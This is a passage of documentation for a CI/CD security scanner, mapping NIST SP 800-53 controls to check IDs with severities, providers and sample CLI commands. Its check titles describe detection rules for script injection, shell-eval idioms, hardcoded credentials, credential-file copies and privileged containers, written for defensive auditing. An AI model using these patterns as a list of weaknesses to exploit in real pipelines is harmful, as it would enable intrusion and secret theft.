NIST SP 800-53 Rev. 5
- Version: Rev. 5
- URL: https://csrc.nist.gov/pubs/sp/800/53/r5/upd1/final
- Source of truth: pipeline_check/core/standards/data/nist_800_53.py
The federal control catalog. The scanner evidences the AC, AU, CM, IA, RA, SA, SC, SI, and SR family controls whose CI/CD-side state is visible in pipeline configuration. Use this page when an authorization package asks for 800-53 control evidence; pair with NIST SSDF for SSDLC vocabulary.
At a glance
- Controls in this standard: 26
- Controls evidenced by at least one check: 26 / 26
- Distinct checks evidencing this standard: 245
- Of those, autofixable with --fix: 63
How to read severity
Every check below ships at a fixed severity level. The scale is the same across providers and standards, so a CRITICAL finding in one place means the same thing as a CRITICAL finding anywhere else.
| Level | What it means | Examples |
|---|---|---|
| CRITICAL | Active exploit primitive in the workflow as written. Treat as P0: a default scan path lands an attacker on a secret, an RCE, or production write access without further effort. | Hardcoded credential literal, branch ref pointing at a known-compromised action, image signed into an unverified registry. |
| HIGH | Production-impact gap that requires modest attacker effort or a second condition to weaponize. Remediate this sprint; the secondary condition is usually already present in real pipelines. | Action pinned to a floating tag, sensitive permissions on a low-popularity action, mutable container tag in prod. |
| MEDIUM | Significant defense-in-depth gap. Not directly exploitable on its own but disables a control whose absence widens the blast radius of a separate compromise. Backlog with a deadline. | Missing branch protection, container without resource limits, freshly-published dependency consumed before the cooldown window. |
| LOW | Hygiene / hardening issue. Not a vulnerability on its own but raises baseline posture and reduces audit friction. | Missing CI logging retention, SBOM without supplier attribution, ECR repo without scan-on-push. |
| INFO | Degraded-mode signal. The scanner couldn't reach an API or parse a config and surfaces the gap so the operator knows coverage was incomplete. No finding against the workload itself. | CB-000 CodeBuild API access failed, IAM-000 IAM enumeration failed. |
Coverage by control
Click a control ID to jump to the per-control section with the full check list. The severity mix column shows the spread of evidencing checks by severity (Critical / High / Medium / Low / Info, abbreviated C / H / M / L / I).
| Control | Title | Checks | Severity mix |
|---|---|---|---|
| AC-2 | Account Management | 7 | 1H · 6M |
| AC-3 | Access Enforcement | 27 | 7C · 11H · 9M |
| AC-6 | Least Privilege | 50 | 7C · 25H · 17M · 1L |
| AU-2 | Event Logging | 18 | 3H · 5M · 10L |
| AU-9 | Protection of Audit Information | 8 | 1C · 3H · 4M |
| AU-11 | Audit Record Retention | 1 | 1L |
| AU-12 | Audit Record Generation | 8 | 2H · 3M · 3L |
| CM-2 | Baseline Configuration | 13 | 1H · 8M · 4L |
| CM-6 | Configuration Settings | 54 | 6C · 19H · 19M · 10L |
| CM-7 | Least Functionality | 22 | 3C · 13H · 6M |
| CM-8 | System Component Inventory | 9 | 1H · 5M · 3L |
| IA-5 | Authenticator Management | 31 | 13C · 11H · 7M |
| RA-5 | Vulnerability Monitoring and Scanning | 11 | 5H · 6M |
| SA-10 | Developer Configuration Management | 10 | 3H · 7M |
| SA-11 | Developer Testing and Evaluation | 18 | 3C · 11H · 3M · 1L |
| SA-15 | Development Process, Standards, and Tools | 5 | 3H · 2M |
| SC-7 | Boundary Protection | 22 | 9C · 7H · 6M |
| SC-8 | Transmission Confidentiality and Integrity | 9 | 5H · 3M · 1L |
| SC-12 | Cryptographic Key Establishment and Management | 9 | 2H · 7M |
| SC-13 | Cryptographic Protection | 9 | 2H · 7M |
| SC-28 | Protection of Information at Rest | 12 | 4C · 3H · 5M |
| SI-2 | Flaw Remediation | 33 | 14H · 12M · 7L |
| SI-7 | Software, Firmware, and Information Integrity | 33 | 4C · 14H · 15M |
| SR-3 | Supply Chain Controls and Processes | 39 | 1C · 27H · 7M · 4L |
| SR-4 | Provenance | 24 | 3H · 18M · 3L |
| SR-11 | Component Authenticity | 31 | 27H · 4M |
Filter at runtime
Restrict a scan to checks that evidence this standard with --standard nist_800_53:

    # All providers, only checks tied to this standard
    pipeline_check --standard nist_800_53

    # Compose with --pipeline to scope by provider
    pipeline_check --pipeline github --standard nist_800_53

    # Compose with another standard to widen the lens
    pipeline_check --pipeline aws --standard nist_800_53 --standard owasp_cicd_top_10
Controls in scope
AC-2: Account Management
Evidenced by 7 checks across 4 providers (AWS, Argo Workflows, Kubernetes, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| ARGO-003 | Argo workflow uses the default ServiceAccount | MEDIUM | Argo Workflows | |
| IAM-003 | CI/CD role has no permission boundary | MEDIUM | AWS | |
| IAM-005 | CI/CD role trust policy missing sts:ExternalId | HIGH | AWS | |
| K8S-011 | Pod serviceAccountName unset or 'default' | MEDIUM | Kubernetes | |
| K8S-034 | ServiceAccount automountServiceAccountToken not explicitly false | MEDIUM | Kubernetes | |
| PBAC-002 | CodeBuild service role shared across multiple projects | MEDIUM | AWS | |
| TKN-007 | Tekton run uses the default ServiceAccount | MEDIUM | Tekton | |
AC-3: Access Enforcement
Evidenced by 27 checks across 7 providers (AWS, Azure DevOps, Bitbucket, Buildkite, Cloud Build, GitLab CI, Kubernetes).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| ADO-004 | Deployment job missing environment binding | MEDIUM | Azure DevOps | |
| BB-004 | Deploy step missing deployment: environment gate | MEDIUM | Bitbucket | |
| BK-007 | Deploy step not gated by a manual block / input | MEDIUM | Buildkite | |
| BK-013 | Deploy step has no branches: filter | MEDIUM | Buildkite | |
| CA-003 | CodeArtifact domain policy allows cross-account wildcard | CRITICAL | AWS | |
| CCM-001 | CodeCommit repository has no approval rule template attached | HIGH | AWS | |
| CCM-003 | CodeCommit trigger targets SNS/Lambda in a different account | MEDIUM | AWS | |
| ECR-003 | Repository policy allows public access | CRITICAL | AWS | |
| GCB-002 | Cloud Build uses the default service account | HIGH | Cloud Build | |
| GCB-020 | serviceAccount points at the default Cloud Build service account | HIGH | Cloud Build | |
| GL-004 | Deploy job lacks manual approval or environment gate | MEDIUM | GitLab CI | |
| IAM-001 | CI/CD role has AdministratorAccess policy attached | CRITICAL | AWS | |
| IAM-002 | CI/CD role has wildcard Action in attached policy | HIGH | AWS | |
| IAM-004 | CI/CD role can PassRole to any role | HIGH | AWS | |
| IAM-005 | CI/CD role trust policy missing sts:ExternalId | HIGH | AWS | |
| IAM-006 | Sensitive actions granted with wildcard Resource | MEDIUM | AWS | |
| K8S-020 | ClusterRoleBinding grants cluster-admin or system:masters | CRITICAL | Kubernetes | 🔧 fix |
| K8S-021 | Role or ClusterRole grants wildcard verbs+resources | HIGH | Kubernetes | |
| K8S-026 | LoadBalancer Service has no loadBalancerSourceRanges | HIGH | Kubernetes | |
| K8S-029 | RoleBinding grants permissions to the default ServiceAccount | HIGH | Kubernetes | 🔧 fix |
| K8S-032 | Namespace lacks default-deny NetworkPolicy | MEDIUM | Kubernetes | |
| K8S-038 | NetworkPolicy ingress / egress allows all sources or destinations | MEDIUM | Kubernetes | |
| KMS-002 | KMS key policy grants wildcard KMS actions | HIGH | AWS | |
| LMB-002 | Lambda function URL has AuthType=NONE | HIGH | AWS | |
| LMB-004 | Lambda resource policy allows wildcard principal | CRITICAL | AWS | |
| S3-001 | Artifact bucket public access block not fully enabled | CRITICAL | AWS | |
| SM-002 | Secrets Manager resource policy allows wildcard principal | CRITICAL | AWS | |
AC-6: Least Privilege
Evidenced by 50 checks across 9 providers (AWS, Argo Workflows, Buildkite, CircleCI, Cloud Build, Dockerfile, GitHub Actions, Kubernetes, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| ARGO-002 | Argo template container runs privileged or as root | HIGH | Argo Workflows | |
| ARGO-003 | Argo workflow uses the default ServiceAccount | MEDIUM | Argo Workflows | |
| ARGO-004 | Argo workflow mounts hostPath or shares host namespaces | CRITICAL | Argo Workflows | |
| ARGO-013 | Argo workflow does not opt out of SA token automount | MEDIUM | Argo Workflows | |
| BK-005 | Container started with --privileged or host-bind escalation | HIGH | Buildkite | 🔧 fix |
| CA-004 | CodeArtifact repo policy grants codeartifact:* with Resource '*' | HIGH | AWS | |
| CC-014 | Job missing resource_class declaration | MEDIUM | CircleCI | |
| DF-002 | Container runs as root (missing or root USER directive) | HIGH | Dockerfile | 🔧 fix |
| DF-008 | RUN invokes docker --privileged or escalates capabilities | HIGH | Dockerfile | |
| DF-012 | RUN invokes sudo | HIGH | Dockerfile | |
| DF-014 | WORKDIR set to a system / kernel filesystem path | CRITICAL | Dockerfile | |
| DF-015 | RUN grants world-writable permissions (chmod 777 / a+w) | MEDIUM | Dockerfile | |
| DF-017 | ENV PATH prepends a world-writable directory | MEDIUM | Dockerfile | 🔧 fix |
| DF-018 | RUN chown rewrites ownership of a system path | MEDIUM | Dockerfile | |
| EB-002 | EventBridge rule has a wildcard target ARN | HIGH | AWS | |
| GCB-002 | Cloud Build uses the default service account | HIGH | Cloud Build | |
| GCB-016 | Step dir field contains parent-directory escape (..) | MEDIUM | Cloud Build | |
| GCB-020 | serviceAccount points at the default Cloud Build service account | HIGH | Cloud Build | |
| GHA-004 | Workflow has no explicit permissions block | MEDIUM | GitHub Actions | 🔧 fix |
| GHA-034 | Reusable workflow called with secrets: inherit | MEDIUM | GitHub Actions | 🔧 fix |
| IAM-001 | CI/CD role has AdministratorAccess policy attached | CRITICAL | AWS | |
| IAM-002 | CI/CD role has wildcard Action in attached policy | HIGH | AWS | |
| IAM-003 | CI/CD role has no permission boundary | MEDIUM | AWS | |
| IAM-004 | CI/CD role can PassRole to any role | HIGH | AWS | |
| IAM-006 | Sensitive actions granted with wildcard Resource | MEDIUM | AWS | |
| K8S-005 | Container securityContext.privileged: true | CRITICAL | Kubernetes | 🔧 fix |
| K8S-006 | Container allowPrivilegeEscalation not explicitly false | HIGH | Kubernetes | 🔧 fix |
| K8S-007 | Container runAsNonRoot not true / runAsUser is 0 | HIGH | Kubernetes | 🔧 fix |
| K8S-009 | Container capabilities not dropping ALL / adding dangerous caps | HIGH | Kubernetes | |
| K8S-011 | Pod serviceAccountName unset or 'default' | MEDIUM | Kubernetes | |
| K8S-012 | Pod automountServiceAccountToken not false | MEDIUM | Kubernetes | |
| K8S-013 | Pod uses a hostPath volume | HIGH | Kubernetes | 🔧 fix |
| K8S-014 | Pod hostPath references a sensitive host directory | CRITICAL | Kubernetes | |
| K8S-020 | ClusterRoleBinding grants cluster-admin or system:masters | CRITICAL | Kubernetes | 🔧 fix |
| K8S-021 | Role or ClusterRole grants wildcard verbs+resources | HIGH | Kubernetes | |
| K8S-023 | Namespace missing Pod Security Admission enforcement label | HIGH | Kubernetes | |
| K8S-025 | System priority class used outside kube-system | HIGH | Kubernetes | |
| K8S-029 | RoleBinding grants permissions to the default ServiceAccount | HIGH | Kubernetes | 🔧 fix |
| K8S-030 | Workload schedules onto a control-plane node | HIGH | Kubernetes | 🔧 fix |
| K8S-031 | Namespace missing PSA warn label | LOW | Kubernetes | |
| K8S-034 | ServiceAccount automountServiceAccountToken not explicitly false | MEDIUM | Kubernetes | |
| K8S-035 | Container securityContext.runAsUser is 0 | HIGH | Kubernetes | |
| K8S-039 | Pod uses shareProcessNamespace: true | MEDIUM | Kubernetes | |
| K8S-040 | Container securityContext.procMount: Unmasked | HIGH | Kubernetes | |
| KMS-002 | KMS key policy grants wildcard KMS actions | HIGH | AWS | |
| PBAC-002 | CodeBuild service role shared across multiple projects | MEDIUM | AWS | |
| TKN-002 | Tekton step runs privileged or as root | HIGH | Tekton | |
| TKN-004 | Tekton Task mounts hostPath or shares host namespaces | CRITICAL | Tekton | |
| TKN-007 | Tekton run uses the default ServiceAccount | MEDIUM | Tekton | |
| TKN-013 | Tekton sidecar runs privileged or as root | HIGH | Tekton | |
AU-2: Event Logging
Evidenced by 18 checks across 9 providers (AWS, Argo Workflows, Buildkite, CircleCI, Cloud Build, Dockerfile, Jenkins, Kubernetes, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| ARGO-007 | Argo workflow has no activeDeadlineSeconds | LOW | Argo Workflows | |
| BK-006 | Step has no timeout_in_minutes | LOW | Buildkite | |
| CB-003 | Build logging not enabled | MEDIUM | AWS | |
| CC-011 | No store_test_results step (test results not archived) | LOW | CircleCI | |
| CD-003 | No CloudWatch alarm monitoring on deployment group | MEDIUM | AWS | |
| CT-001 | No active CloudTrail trail in region | HIGH | AWS | |
| CT-003 | CloudTrail trail is not multi-region | MEDIUM | AWS | |
| CW-001 | No CloudWatch alarm on CodeBuild FailedBuilds metric | LOW | AWS | |
| CWL-001 | CodeBuild log group has no retention policy | LOW | AWS | |
| DF-007 | No HEALTHCHECK directive declared | LOW | Dockerfile | 🔧 fix |
| DF-020 | ARG declares a credential-named build argument | HIGH | Dockerfile | 🔧 fix |
| EB-001 | No EventBridge rule for CodePipeline failure notifications | MEDIUM | AWS | |
| GCB-014 | Build logging disabled (options.logging: NONE) | HIGH | Cloud Build | 🔧 fix |
| GCB-025 | Build has no tags for audit / discoverability | LOW | Cloud Build | |
| JF-011 | Pipeline has no buildDiscarder retention policy | LOW | Jenkins | 🔧 fix |
| K8S-024 | Container missing both livenessProbe and readinessProbe | MEDIUM | Kubernetes | |
| S3-004 | Artifact bucket access logging not enabled | LOW | AWS | |
| TKN-006 | Tekton run lacks an explicit timeout | LOW | Tekton | |
AU-9: Protection of Audit Information
Evidenced by 8 checks across 2 providers (AWS, Cloud Build).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| CT-001 | No active CloudTrail trail in region | HIGH | AWS | |
| CT-002 | CloudTrail log-file validation disabled | MEDIUM | AWS | |
| CWL-002 | CodeBuild log group not KMS-encrypted | MEDIUM | AWS | |
| GCB-014 | Build logging disabled (options.logging: NONE) | HIGH | Cloud Build | 🔧 fix |
| S3-001 | Artifact bucket public access block not fully enabled | CRITICAL | AWS | |
| S3-002 | Artifact bucket server-side encryption not configured | HIGH | AWS | |
| S3-003 | Artifact bucket versioning not enabled | MEDIUM | AWS | |
| S3-005 | Artifact bucket missing aws:SecureTransport deny | MEDIUM | AWS | |
AU-11: Audit Record Retention
Evidenced by 1 check across 1 provider (AWS).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| CWL-001 | CodeBuild log group has no retention policy | LOW | AWS | |
AU-12: Audit Record Generation
Evidenced by 8 checks across 4 providers (AWS, CircleCI, Cloud Build, Jenkins).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| CB-003 | Build logging not enabled | MEDIUM | AWS | |
| CC-011 | No store_test_results step (test results not archived) | LOW | CircleCI | |
| CD-003 | No CloudWatch alarm monitoring on deployment group | MEDIUM | AWS | |
| CT-001 | No active CloudTrail trail in region | HIGH | AWS | |
| CT-003 | CloudTrail trail is not multi-region | MEDIUM | AWS | |
| GCB-014 | Build logging disabled (options.logging: NONE) | HIGH | Cloud Build | 🔧 fix |
| JF-011 | Pipeline has no buildDiscarder retention policy | LOW | Jenkins | 🔧 fix |
| S3-004 | Artifact bucket access logging not enabled | LOW | AWS | |
CM-2: Baseline Configuration
Evidenced by 13 checks across 8 providers (AWS, Argo Workflows, Azure DevOps, Buildkite, Cloud Build, Dockerfile, Helm, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| ADO-005 | Container image not pinned to specific version | HIGH | Azure DevOps | |
| ARGO-011 | No SLSA provenance attestation produced | MEDIUM | Argo Workflows | |
| BK-011 | No SLSA provenance attestation produced | MEDIUM | Buildkite | |
| CB-005 | Outdated managed build image | MEDIUM | AWS | |
| DF-010 | apt-get dist-upgrade / upgrade pulls unknown package versions | LOW | Dockerfile | |
| ECR-004 | No lifecycle policy configured | LOW | AWS | |
| GCB-007 | availableSecrets references versions/latest | MEDIUM | Cloud Build | 🔧 fix |
| GCB-017 | Image-producing build does not request SLSA provenance | MEDIUM | Cloud Build | |
| GCB-018 | Legacy KMS secrets block in use (prefer availableSecrets / Secret Manager) | MEDIUM | Cloud Build | |
| HELM-001 | Chart.yaml declares legacy apiVersion: v1 | MEDIUM | Helm | 🔧 fix |
| HELM-006 | Chart.yaml does not declare a kubeVersion compatibility range | LOW | Helm | |
| HELM-010 | Chart.yaml appVersion field is empty or missing | LOW | Helm | |
| TKN-011 | No SLSA provenance attestation produced | MEDIUM | Tekton | |
CM-6: Configuration Settings
Evidenced by 54 checks across 14 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, Dockerfile, GitHub Actions, GitLab CI, Helm, Jenkins, Kubernetes, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| ADO-002 | Script injection via attacker-controllable context | HIGH | Azure DevOps | |
| ARGO-005 | Argo input parameter interpolated unsafely in script / args | CRITICAL | Argo Workflows | |
| BB-002 | Script injection via attacker-controllable context | HIGH | Bitbucket | |
| BB-005 | Step has no max-time, unbounded build | MEDIUM | Bitbucket | 🔧 fix |
| BK-003 | Untrusted Buildkite variable interpolated in command | HIGH | Buildkite | |
| CB-002 | Privileged mode enabled | HIGH | AWS | |
| CB-004 | No build timeout configured | LOW | AWS | |
| CB-007 | CodeBuild webhook has no filter group | MEDIUM | AWS | |
| CC-002 | Script injection via untrusted environment variable | HIGH | CircleCI | |
| CC-010 | Self-hosted runner without ephemeral marker | MEDIUM | CircleCI | |
| CC-012 | Dynamic config via setup: true enables code injection | MEDIUM | CircleCI | |
| CC-014 | Job missing resource_class declaration | MEDIUM | CircleCI | |
| CC-015 | No no_output_timeout configured | MEDIUM | CircleCI | 🔧 fix |
| CC-017 | Docker run with insecure flags (privileged/host mount) | CRITICAL | CircleCI | 🔧 fix |
| CP-003 | Source stage using polling instead of event-driven trigger | LOW | AWS | |
| DF-002 | Container runs as root (missing or root USER directive) | HIGH | Dockerfile | 🔧 fix |
| DF-005 | RUN uses shell-eval (eval / sh -c on a variable / backticks) | HIGH | Dockerfile | |
| DF-009 | ADD used where COPY would suffice | LOW | Dockerfile | |
| DF-011 | Package manager install without cache cleanup in same layer | LOW | Dockerfile | |
| DF-012 | RUN invokes sudo | HIGH | Dockerfile | |
| DF-014 | WORKDIR set to a system / kernel filesystem path | CRITICAL | Dockerfile | |
| DF-015 | RUN grants world-writable permissions (chmod 777 / a+w) | MEDIUM | Dockerfile | |
| DF-017 | ENV PATH prepends a world-writable directory | MEDIUM | Dockerfile | 🔧 fix |
| DF-018 | RUN chown rewrites ownership of a system path | MEDIUM | Dockerfile | |
| GCB-005 | Build timeout unset or excessive | LOW | Cloud Build | 🔧 fix |
| GCB-006 | Dangerous shell idiom (eval, sh -c variable, backtick exec) | HIGH | Cloud Build | |
| GCB-016 | Step dir field contains parent-directory escape (..) | MEDIUM | Cloud Build | |
| GCB-019 | Shell entrypoint inlines a user substitution into args | HIGH | Cloud Build | |
| GCB-022 | options.substitutionOption set to ALLOW_LOOSE | LOW | Cloud Build | 🔧 fix |
| GCB-023 | Step references a user substitution not declared in substitutions: | MEDIUM | Cloud Build | |
| GCB-026 | Step waitFor: references an unknown step id | MEDIUM | Cloud Build | |
| GHA-002 | pull_request_target checks out PR head | CRITICAL | GitHub Actions | 🔧 fix |
| GHA-003 | Script injection via untrusted context | HIGH | GitHub Actions | 🔧 fix |
| GHA-004 | Workflow has no explicit permissions block | MEDIUM | GitHub Actions | 🔧 fix |
| GHA-035 | github-script step interpolates untrusted context | HIGH | GitHub Actions | |
| GL-002 | Script injection via untrusted commit/MR context | HIGH | GitLab CI | |
| GL-005 | include: pulls remote / project without pinned ref | HIGH | GitLab CI | |
| HELM-006 | Chart.yaml does not declare a kubeVersion compatibility range | LOW | Helm | |
| JF-015 | Pipeline has no timeout wrapper, unbounded build | MEDIUM | Jenkins | 🔧 fix |
| K8S-005 | Container securityContext.privileged: true | CRITICAL | Kubernetes | 🔧 fix |
| K8S-006 | Container allowPrivilegeEscalation not explicitly false | HIGH | Kubernetes | 🔧 fix |
| K8S-007 | Container runAsNonRoot not true / runAsUser is 0 | HIGH | Kubernetes | 🔧 fix |
| K8S-008 | Container readOnlyRootFilesystem not true | MEDIUM | Kubernetes | 🔧 fix |
| K8S-010 | Container seccompProfile not RuntimeDefault or Localhost | MEDIUM | Kubernetes | |
| K8S-015 | Container missing resources.limits.memory | MEDIUM | Kubernetes | |
| K8S-016 | Container missing resources.limits.cpu | LOW | Kubernetes | |
| K8S-019 | Workload deployed in the 'default' namespace | LOW | Kubernetes | |
| K8S-023 | Namespace missing Pod Security Admission enforcement label | HIGH | Kubernetes | |
| K8S-031 | Namespace missing PSA warn label | LOW | Kubernetes | |
| K8S-033 | Namespace lacks ResourceQuota or LimitRange | MEDIUM | Kubernetes | |
| K8S-035 | Container securityContext.runAsUser is 0 | HIGH | Kubernetes | |
| K8S-039 | Pod uses shareProcessNamespace: true | MEDIUM | Kubernetes | |
| K8S-040 | Container securityContext.procMount: Unmasked | HIGH | Kubernetes | |
| TKN-003 | Tekton param interpolated unsafely in step script | CRITICAL | Tekton | |
CM-7: Least Functionality
Evidenced by 22 checks across 8 providers (AWS, Argo Workflows, Buildkite, CircleCI, Dockerfile, GitHub Actions, Kubernetes, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| ARGO-002 | Argo template container runs privileged or as root | HIGH | Argo Workflows | |
| BK-005 | Container started with --privileged or host-bind escalation | HIGH | Buildkite | 🔧 fix |
| CB-002 | Privileged mode enabled | HIGH | AWS | |
| CB-007 | CodeBuild webhook has no filter group | MEDIUM | AWS | |
| CC-010 | Self-hosted runner without ephemeral marker | MEDIUM | CircleCI | |
| CC-017 | Docker run with insecure flags (privileged/host mount) | CRITICAL | CircleCI | 🔧 fix |
| DF-008 | RUN invokes docker --privileged or escalates capabilities | HIGH | Dockerfile | |
| DF-013 | EXPOSE declares sensitive remote-access port | CRITICAL | Dockerfile | 🔧 fix |
| GHA-004 | Workflow has no explicit permissions block | MEDIUM | GitHub Actions | 🔧 fix |
| K8S-002 | Pod hostNetwork: true | HIGH | Kubernetes | 🔧 fix |
| K8S-003 | Pod hostPID: true | HIGH | Kubernetes | 🔧 fix |
| K8S-004 | Pod hostIPC: true | HIGH | Kubernetes | 🔧 fix |
| K8S-005 | Container securityContext.privileged: true | CRITICAL | Kubernetes | 🔧 fix |
| K8S-009 | Container capabilities not dropping ALL / adding dangerous caps | HIGH | Kubernetes | |
| K8S-012 | Pod automountServiceAccountToken not false | MEDIUM | Kubernetes | |
| K8S-021 | Role or ClusterRole grants wildcard verbs+resources | HIGH | Kubernetes | |
| K8S-022 | Service exposes SSH (port 22) | MEDIUM | Kubernetes | |
| K8S-025 | System priority class used outside kube-system | HIGH | Kubernetes | |
| K8S-028 | Container declares hostPort | MEDIUM | Kubernetes | 🔧 fix |
| K8S-030 | Workload schedules onto a control-plane node | HIGH | Kubernetes | 🔧 fix |
| TKN-002 | Tekton step runs privileged or as root | HIGH | Tekton | |
| TKN-013 | Tekton sidecar runs privileged or as root | HIGH | Tekton | |
CM-8: System Component Inventory
Evidenced by 9 checks across 7 providers (AWS, Argo Workflows, Buildkite, CircleCI, Cloud Build, Dockerfile, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| ARGO-010 | No SBOM generated for build artifacts | MEDIUM | Argo Workflows | |
| BK-010 | No SBOM generated for build artifacts | MEDIUM | Buildkite | |
| CC-007 | SBOM not produced (no CycloneDX/syft/Trivy-SBOM step) | MEDIUM | CircleCI | |
| DF-016 | Image lacks OCI provenance labels | LOW | Dockerfile | |
| ECR-002 | Image tags are mutable | HIGH | AWS | |
| ECR-004 | No lifecycle policy configured | LOW | AWS | |
| GCB-015 | SBOM not produced (no CycloneDX / syft / Trivy-SBOM step) | MEDIUM | Cloud Build | |
| GCB-024 | Build pushes Docker images but top-level images: is empty | LOW | Cloud Build | |
| TKN-010 | No SBOM generated for build artifacts | MEDIUM | Tekton | |
IA-5: Authenticator Management
Evidenced by 31 checks across 13 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, Dockerfile, GitHub Actions, GitLab CI, Jenkins, Kubernetes, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| ADO-003 | Variables contain literal secret values | CRITICAL | Azure DevOps | |
| ARGO-006 | Literal secret value in Argo template env or parameter default | CRITICAL | Argo Workflows | 🔧 fix |
| ARGO-013 | Argo workflow does not opt out of SA token automount | MEDIUM | Argo Workflows | |
| BB-003 | Variables contain literal secret values | CRITICAL | Bitbucket | |
| BK-002 | Literal secret value in pipeline env block | CRITICAL | Buildkite | 🔧 fix |
| CB-001 | Secrets in plaintext environment variables | CRITICAL | AWS | |
| CB-006 | CodeBuild source auth uses long-lived token | HIGH | AWS | |
| CC-004 | Secret-like environment variable not managed via context | MEDIUM | CircleCI | |
| CC-005 | AWS auth uses long-lived access keys in environment block | MEDIUM | CircleCI | 🔧 fix |
| CC-008 | Credential-shaped literal in config body | CRITICAL | CircleCI | 🔧 fix |
| CC-019 | add_ssh_keys without fingerprint restriction | HIGH | CircleCI | |
| CP-004 | Legacy ThirdParty/GitHub source action (OAuth token) | HIGH | AWS | |
| DF-006 | ENV or ARG carries a credential-shaped literal value | CRITICAL | Dockerfile | |
| DF-019 | COPY/ADD source path looks like a credential file | HIGH | Dockerfile | 🔧 fix |
| DF-020 | ARG declares a credential-named build argument | HIGH | Dockerfile | 🔧 fix |
| GCB-003 | Secret Manager value referenced in step args | HIGH | Cloud Build | |
| GCB-012 | Credential-shaped literal in pipeline body | CRITICAL | Cloud Build | |
| GCB-018 | Legacy KMS secrets block in use (prefer availableSecrets / Secret Manager) | MEDIUM | Cloud Build | |
| GHA-005 | AWS auth uses long-lived access keys | MEDIUM | GitHub Actions | 🔧 fix |
| GHA-034 | Reusable workflow called with secrets: inherit | MEDIUM | GitHub Actions | 🔧 fix |
| GL-003 | Variables contain literal secret values | CRITICAL | GitLab CI | |
| JF-004 | AWS auth uses long-lived access keys via withCredentials | MEDIUM | Jenkins | 🔧 fix |
| JF-008 | Credential-shaped literal in pipeline body | CRITICAL | Jenkins | 🔧 fix |
| JF-010 | Long-lived AWS keys exposed via environment {} block | HIGH | Jenkins | 🔧 fix |
| K8S-017 | Container env value carries a credential-shaped literal | CRITICAL | Kubernetes | |
| K8S-018 | Secret stringData/data carries a credential-shaped literal | CRITICAL | Kubernetes | |
| K8S-037 | ConfigMap data carries a credential-shaped literal | HIGH | Kubernetes | |
| LMB-003 | Lambda function env vars may contain plaintext secrets | HIGH | AWS | |
| SM-001 | Secrets Manager secret has no rotation configured | HIGH | AWS | |
| SSM-001 | SSM Parameter with secret-like name is not a SecureString | HIGH | AWS | |
| TKN-005 | Literal secret value in Tekton step env or param default | CRITICAL | Tekton | 🔧 fix |
RA-5: Vulnerability Monitoring and Scanning
Evidenced by 11 checks across 7 providers (AWS, Argo Workflows, Buildkite, CircleCI, Cloud Build, GitHub Actions, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| ARGO-012 | No vulnerability scanning step | MEDIUM | Argo Workflows | |
| BK-012 | No vulnerability scanning step | MEDIUM | Buildkite | |
| CB-005 | Outdated managed build image | MEDIUM | AWS | |
| CC-001 | Orb not pinned to exact semver | HIGH | CircleCI | 🔧 fix |
| CC-003 | Docker image not pinned by digest | HIGH | CircleCI | |
| CC-020 | No vulnerability scanning step | MEDIUM | CircleCI | |
| ECR-001 | Image scanning on push not enabled | HIGH | AWS | |
| GCB-001 | Cloud Build step image not pinned by digest | HIGH | Cloud Build | 🔧 fix |
| GCB-008 | No vulnerability scanning step in Cloud Build pipeline | MEDIUM | Cloud Build | |
| GHA-001 | Action not pinned to commit SHA | HIGH | GitHub Actions | 🔧 fix |
| TKN-012 | No vulnerability scanning step | MEDIUM | Tekton | |
SA-10: Developer Configuration Management
Evidenced by 10 checks across 6 providers (AWS, Azure DevOps, Bitbucket, Buildkite, CircleCI, GitLab CI).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| ADO-004 | Deployment job missing environment binding | MEDIUM | Azure DevOps | |
| BB-004 | Deploy step missing deployment: environment gate | MEDIUM | Bitbucket | |
| BK-007 | Deploy step not gated by a manual block / input | MEDIUM | Buildkite | |
| CC-009 | Deploy job missing manual approval gate | MEDIUM | CircleCI | |
| CC-013 | Deploy job in workflow has no branch filter | MEDIUM | CircleCI | |
| CCM-001 | CodeCommit repository has no approval rule template attached | HIGH | AWS | |
| CD-001 | Automatic rollback on failure not enabled | MEDIUM | AWS | |
| CD-002 | AllAtOnce deployment config, no canary or rolling strategy | HIGH | AWS | |
| CP-001 | No approval action before deploy stages | HIGH | AWS | |
| GL-004 | Deploy job lacks manual approval or environment gate | MEDIUM | GitLab CI | |
SA-11: Developer Testing and Evaluation
Evidenced by 18 checks across 11 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, Dockerfile, GitHub Actions, GitLab CI, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| ADO-002 | Script injection via attacker-controllable context | HIGH | Azure DevOps | |
| ARGO-005 | Argo input parameter interpolated unsafely in script / args | CRITICAL | Argo Workflows | |
| BB-002 | Script injection via attacker-controllable context | HIGH | Bitbucket | |
| BK-003 | Untrusted Buildkite variable interpolated in command | HIGH | Buildkite | |
| CC-002 | Script injection via untrusted environment variable | HIGH | CircleCI | |
| CC-012 | Dynamic config via setup: true enables code injection | MEDIUM | CircleCI | |
| DF-005 | RUN uses shell-eval (eval / sh -c on a variable / backticks) | HIGH | Dockerfile | |
| ECR-001 | Image scanning on push not enabled | HIGH | AWS | |
| GCB-006 | Dangerous shell idiom (eval, sh -c variable, backtick exec) | HIGH | Cloud Build | |
| GCB-008 | No vulnerability scanning step in Cloud Build pipeline | MEDIUM | Cloud Build | |
| GCB-019 | Shell entrypoint inlines a user substitution into args | HIGH | Cloud Build | |
| GCB-022 | options.substitutionOption set to ALLOW_LOOSE | LOW | Cloud Build | 🔧 fix |
